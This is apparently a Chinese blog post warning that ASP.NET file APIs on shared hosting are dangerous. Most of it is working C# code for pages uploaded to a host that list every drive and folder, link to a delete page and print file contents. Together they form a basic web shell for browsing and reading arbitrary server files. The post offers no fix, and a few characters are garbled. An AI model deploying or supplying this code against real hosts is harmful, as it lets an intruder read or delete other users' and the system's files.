ASP.NET的安全隱患—文件操作

.net的文件操作存在巨大的安全隱患，寫了幾個(gè)文件傳到虛擬主機(jī)上，不但可以看到主機(jī)上的文件，甚至還可以進(jìn)行刪除等一系列的文件操作
得的驅(qū)動器目錄

getit.aspx.cs

            string[] drivers=Directory.GetLogicalDrives();
            int NumOfDriver=drivers.Length;
            for(int i=0;i<NumOfDriver;i++)
            {
                Response.Write("<a href=listdir.aspx?dir=" + Server.UrlEncode(drivers[i]) + ">" + drivers[i] + "</a><br>");
            }

listdir.aspx.cs獲得文件

string strDir=Request.QueryString.Get("dir");
            try
            {
                DirectoryInfo theDir=new DirectoryInfo(strDir);
                Response.Write(strDir + "  建立時(shí)間：" + theDir.CreationTime.ToString() + "<br>");
                //獲得子目錄
                DirectoryInfo[] subDir=theDir.GetDirectories();
                Response.Write("文件夾");
                for(int i=0;i<subDir.Length;i++)
                {
                    Response.Write("<br><a href=listdir.aspx?dir=" + Server.UrlEncode(subDir[i].FullName) + ">" + subDir[i].FullName  + "</a>");
                }
                Response.Write("<br>");
                //獲得文件
                Response.Write("文件");
                FileInfo[] theFiles=theDir.GetFiles();
                for(int i=0;i<theFiles.Length;i++)
                {
                    Response.Write("<br><a href=showfile.aspx?file=" + Server.UrlEncode(theFiles[i].FullName) + ">" +theFiles[i].FullName + "</a>");
                    Response.Write("&nbsp;&nbsp;<a href=delfile.aspx?file=" + Server.UrlEncode(theFiles[i].FullName) + ">刪除</a>");
                }
            }
            catch(Exception ex)
            {
                Response.Write(ex.ToString());
            }

showfile.aspx.cs讀取文件信息

            string strFile=Request.QueryString.Get("file");
            FileInfo file=new FileInfo(strFile);
            Response.Write("<br>");
            Response.Write("<br>名稱：" + file.Name);
            Response.Write("<br>路徑：" + file.FullName);
            Response.Write("<br>當(dāng)前目錄：" + file.Directory);
            Response.Write("<br>建立時(shí)間：" + file.CreationTime.ToString());
            Response.Write("<br>大�。�" + file.Length.ToString() + "Bytes");
            Response.Write("<br>上次訪問時(shí)間：" + file.LastAccessTime.ToString());
            Response.Write("<br>上次修改時(shí)間：" + file.LastWriteTime.ToString());
            Response.Write("<br>");
            Response.Write("Open with text(讀取一定數(shù)量字符)" + "<br>");

            StreamReader reader=file.OpenText();
            char[] buffer=new char[255];
            int nRead=reader.ReadBlock(buffer,0,255);
            Response.Write("<pre>");
            Response.Write(Server.HtmlEncode(new String(buffer,0,nRead)));
            Response.Write("</pre>");